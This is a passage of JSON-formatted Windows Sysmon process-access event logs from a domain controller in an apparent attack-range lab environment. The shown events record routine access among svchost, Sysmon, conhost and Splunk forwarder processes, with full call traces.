0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:36.189","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2349,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:36.189\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:36.189","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2350,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:36.189\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:36.189","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2351,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:36.189\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:36.189","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2352,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:36.189\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:36.189","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2353,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:36.189\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:36.189","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2354,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:36.189\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:36.189","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2355,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:36.189\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F80-5F25-0000-00100F230400}\r\nTargetProcessId: 3948\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:36.189","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F80-5F25-0000-00100F230400}","TargetProcessId":"3948","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2356,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:36.329\r\nSourceProcessGUID: {41C8662E-1F80-5F25-0000-00100F230400}\r\nSourceProcessId: 3948\r\nSourceThreadId: 3936\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:36.329","SourceProcessGUID":"{41C8662E-1F80-5F25-0000-00100F230400}","SourceProcessId":"3948","SourceThreadId":"3936","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program 